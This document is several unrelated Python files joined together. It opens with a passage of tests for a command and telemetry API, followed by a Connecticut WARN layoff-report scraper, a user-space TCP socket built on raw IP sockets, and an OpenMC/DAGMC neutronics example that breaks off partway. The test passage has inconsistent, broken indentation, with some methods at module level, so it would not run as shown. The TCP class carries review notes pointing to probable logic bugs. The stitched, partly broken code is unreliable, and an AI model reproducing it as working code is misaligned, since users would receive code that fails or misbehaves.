    seq = ["CommandCounter"] + ["Counter"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
    )
    results1 = self.api.send_and_await_telemetry(
        "apiTester.TEST_CMD_1", channels=seq
    )
    assert len(results1) == 6, "Should have gotten 6 results out of the await"
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
    )
    results2 = self.api.send_and_await_telemetry(
        "apiTester.TEST_CMD_1", channels=seq
    )
    assert len(results2) == 6, "Should have gotten 6 results out of the await"
    for i in range(0, 6):
        assert results1[i] != results2[i], "These sequences should be unique items"
    self.api.clear_histories()
    seq = ["CommandCounter"] + ["Oscillator"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01
    )
    results = self.api.send_and_await_telemetry(
        "apiTester.TEST_CMD_1", channels=seq
    )
    assert len(results) == 6, "Should have gotten 6 results out of the await"
def test_send_and_await_event(self):
    """send_and_await_event should collect the requested event sequence after
    sending the command."""
    result = self.api.send_and_await_event(
        "apiTester.TEST_CMD_1", events="CommandReceived"
    )
    assert result is not None, "the search should have found the CommandReceived Event"
    self.api.clear_histories()
    # One CommandReceived from the send, then five simulated severity events.
    seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
    )
    results1 = self.api.send_and_await_event("apiTester.TEST_CMD_1", events=seq)
    assert len(results1) == 6, "Should have gotten 6 results out of the await"
    self.fill_history_async(
        self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
    )
    results2 = self.api.send_and_await_event("apiTester.TEST_CMD_1", events=seq)
    assert len(results2) == 6, "Should have gotten 6 results out of the await"
    for i in range(0, 6):
        assert results1[i] != results2[i], "These sequences should be unique items"
def test_send_and_assert_telemetry(self):
    """send_and_assert_telemetry should assert the full channel sequence
    arrives within the timeout."""
    self.api.send_and_assert_telemetry(
        "apiTester.TEST_CMD_1", channels="CommandCounter"
    )
    self.api.clear_histories()
    seq = ["CommandCounter"] + ["Counter"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
    )
    results1 = self.api.send_and_assert_telemetry(
        "apiTester.TEST_CMD_1", channels=seq, timeout=5
    )
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01
    )
    results2 = self.api.send_and_assert_telemetry(
        "apiTester.TEST_CMD_1", channels=seq, timeout=5
    )
    for i in range(0, 6):
        assert results1[i] != results2[i], "These sequences should be unique items"
    self.api.clear_histories()
    seq = ["CommandCounter"] + ["Oscillator"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01
    )
    self.api.send_and_assert_telemetry(
        "apiTester.TEST_CMD_1", channels=seq, timeout=5
    )
def test_send_and_assert_event(self):
    """send_and_assert_event should assert the full event sequence arrives
    within the timeout."""
    self.api.send_and_assert_event("apiTester.TEST_CMD_1", events="CommandReceived")
    self.api.clear_histories()
    seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5
    self.fill_history_async(
        self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
    )
    results1 = self.api.send_and_assert_event(
        "apiTester.TEST_CMD_1", events=seq, timeout=5
    )
    self.fill_history_async(
        self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01
    )
    results2 = self.api.send_and_assert_event(
        "apiTester.TEST_CMD_1", events=seq, timeout=5
    )
    for i in range(0, 6):
        assert results1[i] != results2[i], "These sequences should be unique items"
def test_translate_telemetry_name(self):
    """translate_telemetry_name should map names and ids to channel ids and
    raise KeyError for unknown inputs.

    Fix: the error-path checks previously called translate_command_name
    (copy-paste from test_translate_command_name), so the telemetry
    translator's KeyError behavior was never actually exercised.
    """
    assert self.api.translate_telemetry_name("CommandCounter") == 1
    assert self.api.translate_telemetry_name("Oscillator") == 2
    assert self.api.translate_telemetry_name("Counter") == 3
    assert self.api.translate_telemetry_name(1) == 1
    assert self.api.translate_telemetry_name(2) == 2
    assert self.api.translate_telemetry_name(3) == 3
    try:
        self.api.translate_telemetry_name("DOES_NOT_EXIST")
        assert False, "the api should have raised a KeyError"
    except KeyError:
        assert True, "the api raised the correct error"
    try:
        self.api.translate_telemetry_name(0)
        assert False, "the api should have raised a KeyError"
    except KeyError:
        assert True, "the api raised the correct error"
def test_get_telemetry_pred(self):
    """get_telemetry_pred should pass existing predicates through and build
    new ones from id/value fields."""
    pred = predicates.telemetry_predicate()
    result = self.api.get_telemetry_pred(pred)
    assert pred == result, "should return when channel is already telem_pred"
    update = self.get_counter_sequence(1)[0]
    pred = self.api.get_telemetry_pred(update.get_id(), update.get_val())
    assert pred(update), "predicate should return true when fields are specified"
    def test_await_telemetry(self):
        """Exercise await_telemetry hit, miss, and timeout paths.

        NOTE(review): timing-sensitive — relies on the 0.01s/0.1s fill rates
        relative to the awaits below; confirm on slow CI machines.
        """
        seq = self.get_counter_sequence(20)
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01)
        result = self.api.await_telemetry("Counter", 8)
        assert (
            result is not None
        ), "Await should have found a correct channel update: {}".format(result)
        time.sleep(1)
        # The second half of the sequence (values 10-19) never contains 8,
        # so this await is expected to come back empty.
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01)
        result = self.api.await_telemetry("Counter", 8)
        assert result is None, "Await should not have found an update: {}".format(
            result
        )
        self.api.clear_histories()
        # With a slow fill (0.1s/item), value 15 cannot arrive within 1 second.
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1)
        result = self.api.await_telemetry("Counter", 15, timeout=1)
        assert result is None, "Await should not have found an update: {}".format(
            result
        )
    def test_await_telemetry_sequence(self):
        """Exercise await_telemetry_sequence completion, re-search, and timeout.

        NOTE(review): timing-sensitive — fill rates and the 1s timeout below
        are tuned so the searches succeed/fail as asserted; confirm on CI.
        """
        count_seq = self.get_counter_sequence(20)
        sin_seq = self.get_oscillator_sequence(100)
        # Build predicates matching counter values 15 through 19, in order.
        search_seq = []
        for i in range(15, 20):
            pred = self.api.get_telemetry_pred("Counter", i)
            search_seq.append(pred)
        t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        results = self.api.await_telemetry_sequence(search_seq)
        assert len(results) == len(search_seq), "lists should have the same length"
        for i in range(0, len(results)):
            msg = predicates.get_descriptive_string(results[i], search_seq[i])
            assert search_seq[i](results[i]), msg
        t1.join()
        t2.join()
        # Searching again after the fills complete should not succeed —
        # presumably the matching items can only be found once; confirm.
        results = self.api.await_telemetry_sequence(search_seq)
        assert len(results) < len(
            search_seq
        ), "repeating the search should not complete"
        self.api.clear_histories()
        t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        # The 1s timeout should expire before the full sequence arrives.
        results = self.api.await_telemetry_sequence(search_seq, timeout=1)
        assert len(results) < len(
            search_seq
        ), "repeating the search should not complete"
        t1.join()
        t2.join()
def test_await_telemetry_count(self):
count_seq = self.get_counter_sequence(20)
sin_seq = self.get_oscillator_sequence(100)
pred = predicates.greater_than_or_equal_to(10)
search_pred = self.api.get_telemetry_pred("Counter", pred)
count_pred = predicates.within_range(10, 20)
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_count(count_pred, search_pred)
msg = predicates.get_descriptive_string(len(results), count_pred)
assert count_pred(len(results)), msg
t1.join()
t2.join()
self.api.clear_histories()
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
results = self.api.await_telemetry_count(100)
assert len(results) == 100, "await count should have found 100 items"
t1.join()
t2.join()
self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02)
results = self.api.await_telemetry_count(100, timeout=1)
assert len(results) < 100, "await count should have found fewer 100 items"
    def test_assert_telemetry(self):
        """Exercise assert_telemetry success and failure (AssertionError) paths.

        The ``self.AssertionFailure`` sentinel raised after the api call
        distinguishes "the api failed to raise" from the AssertionError the
        api is expected to raise itself.
        """
        seq = self.get_counter_sequence(20)
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01)
        self.api.assert_telemetry("Counter", 8, timeout=1)
        time.sleep(1)
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01)
        try:
            # Searching from "NOW" should miss value 8, which was enqueued earlier.
            self.api.assert_telemetry("Counter", 8, start="NOW", timeout=1)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
        self.api.clear_histories()
        # A slow fill (0.1s/item) cannot deliver value 15 within the timeout.
        self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1)
        try:
            self.api.assert_telemetry("Counter", 15, timeout=1)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
    def test_assert_telemetry_sequence(self):
        """Exercise assert_telemetry_sequence success and failure paths.

        Uses the ``self.AssertionFailure`` sentinel pattern to verify the api
        raises AssertionError when the sequence cannot be found.
        NOTE(review): timing-sensitive fill rates; confirm on slow CI machines.
        """
        count_seq = self.get_counter_sequence(20)
        sin_seq = self.get_oscillator_sequence(100)
        # Predicates matching counter values 15 through 19, in order.
        search_seq = []
        for i in range(15, 20):
            pred = self.api.get_telemetry_pred("Counter", i)
            search_seq.append(pred)
        self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5)
        self.api.assert_telemetry_sequence(search_seq)
        time.sleep(1)
        try:
            # After the fills finish, a fresh "NOW" search must fail.
            self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
        self.api.clear_histories()
        # Slower counter fill: the 1s timeout expires before 15-19 arrive.
        self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.07)
        self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        try:
            self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=1)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
    def test_assert_telemetry_count(self):
        """Exercise assert_telemetry_count success, failure, and timeout paths.

        Uses the ``self.AssertionFailure`` sentinel pattern to verify the api
        raises AssertionError when the count cannot be satisfied.
        NOTE(review): timing-sensitive fill rates; confirm on slow CI machines.
        """
        count_seq = self.get_counter_sequence(20)
        sin_seq = self.get_oscillator_sequence(100)
        # Count counter updates >= 10; expect between 10 and 20 of them.
        pred = predicates.greater_than_or_equal_to(10)
        search_pred = self.api.get_telemetry_pred("Counter", pred)
        count_pred = predicates.within_range(10, 20)
        self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        self.api.assert_telemetry_count(count_pred, search_pred, timeout=2)
        self.api.assert_telemetry_count(count_pred, search_pred)
        self.api.clear_histories()
        t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
        # A plain integer counts any telemetry item.
        self.api.assert_telemetry_count(100, timeout=2)
        t1.join()
        t2.join()
        try:
            # Without a timeout the already-drained history cannot reach 100.
            self.api.assert_telemetry_count(100)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
        self.api.clear_histories()
        # Slow fills: 100 items cannot arrive within the 1s timeout.
        self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
        self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02)
        try:
            self.api.assert_telemetry_count(100, timeout=1)
            raise self.AssertionFailure()
        except AssertionError:
            assert True, "api raised the correct error"
        except self.AssertionFailure:
            assert False, "api failed to raise an assertion error"
def test_translate_event_name(self):
assert self.api.translate_event_name("CommandReceived") == 1
assert self.api.translate_event_name("HistorySizeUpdate") == 2
assert self.api.translate_event_name("SeverityCOMMAND") == 3
assert self.api.translate_event_name("SeverityACTIVITY_LO") == 4
assert self.api.translate_event_name("SeverityACTIVITY_HI") == 5
assert self.api.translate_event_name("SeverityWARNING_LO") == 6
assert self.api.translate_event_name("SeverityWARNING_HI") == 7
assert self.api.translate_event_name("SeverityDIAGNOSTIC") == 8
assert self.api.translate_event_name("SeverityFATAL") == 9
for i in range(1, 10):
assert self.api.translate_event_name(i) == i
try:
self.api.translate_event_name("DOES_NOT_EXIST")
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
try:
self.api.translate_event_name(0)
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
    def test_get_event_pred(self):
        """Check get_event_pred pass-through and field-based construction."""
        pred = predicates.event_predicate()
        result = self.api.get_event_pred(pred)
        # An existing event predicate should be returned unchanged.
        assert pred == result, "should return when channel is already event_pred"
        message = self.get_severity_event("FATAL")
        # A predicate built from the message's own fields must match the message.
        pred = self.api.get_event_pred(
            message.get_id(), message.get_args(), message.get_severity()
        )
        assert pred(message), "predicate should return true when fields are specified"
"""
def test_await_event(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_await_event_sequence(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_await_event_count(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event_sequence(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event_count(self):
raise NotImplementedError("Test Case is not yet implemented")
"""
# Allow running this test module directly with the unittest runner.
if __name__ == "__main__":
    unittest.main()
|
import logging
from datetime import datetime
from pathlib import Path
from bs4 import BeautifulSoup
from .. import utils
from ..cache import Cache
__authors__ = [
"zstumgoren",
"Dilcia19",
"stucka",
]
__tags__ = ["html"]
__source__ = {
"name": "Connecticut Department of Labor",
"url": "https://www.ctdol.state.ct.us/progsupt/bussrvce/warnreports/warnreports.htm",
}
logger = logging.getLogger(__name__)
def scrape(
    data_dir: Path = utils.WARN_DATA_DIR,
    cache_dir: Path = utils.WARN_CACHE_DIR,
) -> Path:
    """
    Scrape data from Connecticut.

    Keyword arguments:
    data_dir -- the Path where the result will be saved (default WARN_DATA_DIR)
    cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)

    Returns: the Path where the file is written
    """
    cache = Cache(cache_dir)
    this_year = datetime.now().year
    output_rows = []
    # Annual report pages begin in 2015 and run through the current year.
    for year in range(2015, this_year + 1):
        url = f"https://www.ctdol.state.ct.us/progsupt/bussrvce/warnreports/warn{year}.htm"
        cache_key = f"ct/{year}.html"
        # Past years never change, so serve them from the cache when possible;
        # the current year is always re-fetched.
        if cache.exists(cache_key) and year < this_year:
            html = cache.read(cache_key)
        else:
            html = utils.get_url(url).text
            cache.write(cache_key, html)
        soup = BeautifulSoup(html, "html.parser")
        # The 2016 page styles its table differently from every other year.
        table_class = "style15" if year == 2016 else "MsoNormalTable"
        table = soup.find_all("table", table_class)
        # Parse the table and accumulate its rows.
        output_rows.extend(_scrape_table(table))
    # Prepend the header row.
    header_row = [
        "warn_date",
        "affected_company",
        "layoff_location",
        "number_workers",
        "layoff_date",
        "closing",
        "closing_date",
        "union",
        "union_address",
    ]
    # Write everything out and hand back the destination path.
    data_path = data_dir / "ct.csv"
    utils.write_rows_to_csv(data_path, [header_row] + output_rows)
    return data_path
def _scrape_table(table) -> list:
"""Scrape the provided table.
Returns: List of data rows.
"""
row_list = []
# loop over table to process each row, skipping the header
for table_row in table[0].find_all("tr")[1:]:
# Get all the cells
table_cells = table_row.find_all("td")
# if a row has more than 9 cells it is handled separately
# the 2016 table has some cells with nested tags
if len(table_cells) > 9:
output_row = _problem_cells(table_cells)
row_list.append(output_row)
continue
# if a row has less than 9 it is skipped because it is incomplete
elif len(table_cells) < 9:
continue
# for the rest, loop over cells for each row
output_row = []
for table_cell in table_cells:
cell = table_cell.text.strip()
cell = " ".join(cell.split())
output_row.append(cell)
# test to see if the row is blank
if not output_row:
continue
# Add row to the big list
row_list.append(output_row)
# Pass it back
logger.debug(f"{len(row_list)} rows parsed")
return row_list
def _problem_cells(table_cells):
"""Deal with problem rows in the 2016 table."""
output_row = []
for table_cell in table_cells:
current_cell = table_cell.text.strip()
current_cell = " ".join(current_cell.split())
if table_cells.index(table_cell) == 0:
output_row.append(current_cell)
else:
previous_index = table_cells.index(table_cell) - 1
previous_cell = table_cells[previous_index].text.strip()
previous_cell = " ".join(previous_cell.split())
if current_cell == previous_cell:
continue
else:
output_row.append(current_cell)
return output_row
# Run the scraper when this module is executed as a script.
if __name__ == "__main__":
    scrape()
|
#! /usr/bin/python3
import random
import datetime
import time
import fcntl
from IP.IPSocket import *
from tcp.TCPPacket import *
import threading
class TCPSocket:
    """A minimal user-space TCP implementation on top of a raw IPSocket.

    Implements the three-way handshake, RTT estimation, retransmission on
    timeout, slow-start/congestion-avoidance window growth, and in-order
    reassembly of out-of-order segments. A daemon thread drives all
    sending/receiving once connect() succeeds.

    NOTE(review): relies on ``queue``, ``socket`` and ``struct`` being
    brought in by the wildcard imports above — confirm they are re-exported
    by IP.IPSocket / tcp.TCPPacket.
    """
    def __init__(self):
        # Raw IP socket; created in connect().
        self.socket = None
        self.connected = False
        # Local endpoint: (ip, random ephemeral port).
        self.src = (get_ip(), random.randrange(0, 1 << 16))
        self.destination = None
        # Background thread running tcp_running_thread().
        self.thread = None
        self.seq = 0
        # Leftover bytes from a previous recv(max=...) call.
        self.received_packet = None
        # Congestion control: slow-start threshold and window (MSS units).
        self.ssthresh = float("inf")
        self.c_window = 1
        # Peer's advertised receive window.
        self.adv_window = float('inf')
        # Smoothed round-trip time in milliseconds (None until measured).
        self.RTT = None
        self.MSS = 536
        # Bookkeeping for the next expected/outgoing packet fields.
        self.next_packet = {
            'ack_num': 1,
            'seq': random.randrange(0, 1 << 32),
            'ack': 0
        }
        # Sequence numbers of out-of-order segments already buffered.
        self.used_seqs = set()
        # In-flight packets as (packet, send_time, is_resend) tuples.
        self.sending_packets = set()
        self.send_queue = queue.Queue()
        self.recv_queue = queue.Queue()
        self.resend_queue = queue.PriorityQueue()
        # Out-of-order segments held until the sequence gap is filled.
        self.disorder_packets = queue.PriorityQueue()
    def connect(self, destination):
        """Perform the three-way handshake with ``destination`` (host, port)
        and start the background TCP processing thread.

        No-op if the background thread is already running. Raises if the
        server does not answer the SYN within 3 minutes.
        """
        if self.thread is not None and self.thread.is_alive():
            # thread has been started
            return
        self.socket = IPSocket(get_ip())
        self.socket.connect(destination)
        self.destination = (socket.gethostbyname(destination[0]), destination[1])
        # handshake
        # starting seq number
        self.seq = random.randint(0, 65535)
        # Send the SYN packet
        syn_packet = TCPPacket(self.src, self.destination, 0, self.seq)
        syn_packet.syn = 1
        syn_packet.checksum()
        # Measure RTT
        sent_time = datetime.datetime.now()
        self.socket.send(syn_packet.build())
        now = time.time()
        packet = None
        # keep trying to receive SYN_ACK packets.
        # NOTE(review): a first packet that unpacks but does not match the
        # SYN-ACK condition ends the loop (packet is no longer None) and
        # falls into the else-clause raise — confirm this is intended.
        while (time.time() - now) < 180 and packet is None:
            packet = self.socket.recv()
            if packet is not None:
                packet = TCPPacket.unpack(packet, self.destination[0], self.src[0])
                if packet.src == self.destination and packet.dest == self.src and packet.syn and packet.ack:
                    break
            time.sleep(0.01)
        else:
            raise Exception("No response from server for 3 minutes")
        # Calculate RTT
        arrive_time = datetime.datetime.now()
        self.RTT = (arrive_time - sent_time).total_seconds() * 1000
        # Get Advertised Window
        self.adv_window = packet.window
        # Get MSS
        for option in packet.options:
            if option['kind'] == 2 and option['length'] == 4:
                self.MSS = option['value']
                break
        # Get next seq
        self.next_packet['next_seq'] = packet.seq + len(packet.data) + 1
        self.seq = packet.ack_num
        # Send the ACK packet
        ack_packet = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'])
        ack_packet.ack = 1
        ack_packet.checksum()
        self.socket.send(ack_packet.build())
        # start the thread
        self.connected = True
        self.thread = threading.Thread(name="tcp-running", target=self.tcp_running_thread)
        self.thread.setDaemon(True)
        self.thread.start()
    def tcp_running_thread(self):
        """
        Main loop of the background thread: flush outgoing packets, drain
        incoming packets, and retransmit anything that has timed out
        (older than 2 * RTT). Runs until the connection is torn down.
        """
        while True:
            if self.connected:
                self.send_packets()
            # Drain every packet currently readable from the raw socket.
            packet = self.socket.recv()
            while packet is not None:
                self.convert_packet(packet)
                packet = self.socket.recv()
            if not self.connected:
                self.close()
                break
            # check if timeout
            if self.RTT is not None:
                t_packets = []
                now = datetime.datetime.now()
                for packet in self.sending_packets:
                    if (now - packet[1]).total_seconds() * 1000 > 2 * self.RTT:
                        t_packets.append(packet)
                # update window if timeout
                # (multiplicative decrease: halve threshold, restart slow start)
                if len(t_packets) > 0:
                    self.ssthresh = self.c_window / 2
                    self.c_window = 1
                # resend the timeout packets
                for packet in t_packets:
                    self.sending_packets.remove(packet)
                    self.resend_queue.put((packet[0].seq, packet[0]))
            time.sleep(0.050)
    def send_packets(self):
        """Send or resend packets to server, within the effective window.

        NOTE(review): ``space`` is computed once and never decremented as
        packets go out below, so one call can exceed the window — confirm.
        """
        space = min(self.c_window, self.adv_window) / self.MSS - len(self.sending_packets)
        # resend the timeout packets
        while not self.resend_queue.empty():
            if space > 0:
                seq, packet = self.resend_queue.get()
                # NOTE(review): packets larger than MSS are silently dropped
                # here (popped but never sent or re-queued) — confirm.
                if len(packet) <= self.MSS:
                    self.socket.send(packet.build())
                    self.sending_packets.add((packet, datetime.datetime.now(), True))
            else:
                break
        # send new packets
        while not self.send_queue.empty():
            if space > 0:
                if not self.connected:
                    return
                else:
                    # Send a packet of data or ack another packet.
                    # Coalesce queued chunks up to one MSS per packet.
                    data = b''
                    while not self.send_queue.empty() and len(data) < self.MSS:
                        data += self.send_queue.get()
                    # Create packet
                    packet = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'], data)
                    packet.ack = 1
                    packet.checksum()
                    # Track sending packet.
                    self.sending_packets.add((packet, datetime.datetime.now(), False))
                    # Send packet
                    self.socket.send(packet.build())
            else:
                break
    def convert_packet(self, packet):
        """Parse one raw inbound packet and update connection state:
        MSS/window bookkeeping, ACK processing, in-order delivery, and
        buffering of out-of-order segments.
        """
        packet = TCPPacket.unpack(packet, self.destination[0], self.src[0])
        packet.checksum()
        # Check validity (checksum of a correct packet re-computes to 0)
        if packet.check == 0 and packet.src == self.destination and packet.dest == self.src:
            # Get MSS
            for option in packet.options:
                if option['kind'] == 2 and option['length'] == 4:
                    self.MSS = option['value']
                    break
            if packet.fin or packet.rst:
                self.connected = False
            # Check if it contains data or syn
            if (len(packet.data) > 0) or packet.syn:
                self.next_packet['ack'] = 1
            # Handle ACK
            if packet.ack and packet.ack_num >= self.seq:
                self.ack_process(packet)
            # Get the next seq number
            next_seq = packet.seq + len(packet.data)
            if len(packet.data) > 0 and packet.seq == self.next_packet['next_seq']:
                # This is the packet we need.
                self.next_packet['next_seq'] = next_seq
                self.recv_queue.put(packet.data)
                # Drain any buffered segments that now continue the stream.
                # NOTE(review): next_packet['next_seq'] is not advanced for
                # the drained segments (only the local next_seq is) — confirm.
                while not self.disorder_packets.empty():
                    p = self.disorder_packets.get()
                    if p.seq == next_seq:
                        self.recv_queue.put(p.data)
                        next_seq = p.seq + len(p.data)
                    else:
                        self.disorder_packets.put(p)
                        break
            elif len(packet.data) > 0 and packet.seq > self.next_packet['next_seq'] and packet.seq not in self.used_seqs:
                # Packet is too early, store it.
                self.disorder_packets.put(packet)
                self.used_seqs.add(packet.seq)
            # Ack the packet if it has data
            if self.next_packet['ack']:
                p = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'])
                p.ack = 1
                p.checksum()
                self.socket.send(p.build())
            self.adv_window = packet.window
    def ack_process(self, packet):
        """Deal the ACK packet: retire acknowledged in-flight packets,
        update the smoothed RTT, and grow the congestion window.
        """
        self.seq = packet.ack_num
        # Find acked packets
        acked_p = set()
        packets_in_sending = self.sending_packets.copy()
        # NOTE(review): comparing against next_packet['seq'] (a random value
        # fixed at construction) looks suspicious — packet.ack_num may have
        # been intended here; confirm.
        for packet in packets_in_sending:
            if packet[0].seq <= self.next_packet['seq']:
                acked_p.add(packet)
                self.sending_packets.remove(packet)
        # Manage RTT.
        now = datetime.datetime.now()
        ALPHA = 0.875 # NEW_RTT = ALPHA * OLD_RTT + (1 - ALPHA) * PACKET_RTT
        for packet in acked_p:
            if not packet[2]:
                # Packet didn't time out so it's valid for RTT calculation
                packet_rtt = now - packet[1]
                if self.RTT is not None:
                    self.RTT = ALPHA * self.RTT + (1 - ALPHA) * packet_rtt.total_seconds() * 1000
                else:
                    self.RTT = packet_rtt.total_seconds() * 1000
            # update the congestion window.
            # (additive increase past ssthresh, slow start below it)
            if self.ssthresh <= self.c_window:
                self.c_window += (1 / self.c_window)
            else:
                self.c_window += 1
    def sendall(self, data):
        """Send all the data (queued for the background thread)."""
        self.send_queue.put(data)
    def recv(self, max=None):
        """Get data from the socket.

        Returns up to ``max`` bytes (all available bytes when max is None);
        any excess is held in self.received_packet for the next call.
        Raises once the connection has been closed.
        """
        packet = b''
        if not self.connected:
            raise Exception("Socket closed")
        if self.received_packet is None:
            # Drain everything currently queued by the background thread.
            while True:
                if not self.recv_queue.empty():
                    packet += self.recv_queue.get(block=False)
                else:
                    break
            if max is not None and len(packet) > max:
                # Keep the overflow for the next recv() call.
                self.received_packet = packet[max:]
                packet = packet[:max]
        else:
            # Serve leftover bytes from a previous call first.
            packet = self.received_packet
            if max is None or len(packet) <= max:
                self.received_packet = None
            else:
                self.received_packet = packet[max:]
                packet = packet[:max]
        return packet
    def close(self):
        """Close the socket by sending a FIN and marking the connection down."""
        # NOTE(review): the 'fin' flag stored here is never read back in
        # this class — confirm whether anything else consumes it.
        self.next_packet['fin'] = 1
        p = TCPPacket(self.src, self.destination, 0, self.seq)
        p.fin = 1
        p.checksum()
        self.socket.send(p.build())
        self.connected = False
    def send(self, data):
        """Send some data over the network."""
        self.send_queue.put(data)
def get_ip(interface='eth0'):
    """Return the IPv4 address bound to *interface* (Linux only)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    packed_iface = struct.pack('256s', interface[:15].encode())
    # SIOCGIFADDR (0x8915): bytes 20-24 of the ioctl result hold the address.
    result = fcntl.ioctl(probe.fileno(), 0x8915, packed_iface)
    return socket.inet_ntoa(result[20:24])
<filename>examples/create_statepoint_file_with_meshes_openmc_dagmc.py<gh_stars>0
# This minimal example makes a 3D volume and exports the shape to a stp file
# A surrounding volume called a graveyard is needed for neutronics simulations
import openmc
import openmc_dagmc_wrapper as odw
import openmc_plasma_source as ops
from stl_to_h5m import stl_to_h5m
from dagmc_bounding_box import DagmcBoundingBox
# code used to create example.stl
# import paramak
# my_shape = paramak.ExtrudeStraightShape(
# points=[(1, 1), (1, 200), (600, 200), (600, 1)],
# distance=180,
# )
# my_shape.export_stl("example.stl")
# This script converts the CAD stl files generated into h5m files that can be
# used in DAGMC enabled codes. h5m files created in this way are imprinted,
# merged, faceted and ready for use in OpenMC. One of the key aspects of this
# is the assignment of materials to the volumes present in the CAD files.
stl_to_h5m(
files_with_tags=[("example.stl", "mat1")],
h5m_filename="dagmc.h5m",
)
my_corners = DagmcBoundingBox("dagmc.h5m").corners()
# makes use of the previously created neutronics geometry (h5m file) and assigns
# actual materials to the material tags. Sets simulation intensity and specifies
# the neutronics results to record (know as tallies).
geometry = odw.Geometry(
h5m_filename="dagmc.h5m",
)
materials = odw.Materials(
h5m_filename="dagmc.h5m", correspondence_dict={"mat1": "FLiNaK"}
)
tally1 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xy",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally2 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="yz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally3 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally4 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xy",
mesh_resolution=(10, 10),
bounding_box=my_corners,
)
tally5 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="yz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally6 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
# tally2 = odw.MeshTally3D(
# mesh_resolution=(100, 100, 100),
# bounding_box=my_corners,
# tally_type="neutron_effective_dose",
# )
tallies = openmc.Tallies(
[
tally1,
tally2,
tally3,
tally4,
tally5,
tally6,
]
)
settings = odw.FusionSettings()
settings.batches = 2
settings.particles = 1000
# assigns a ring source of DT energy neutrons to the source using the
# openmc_plasma_source package
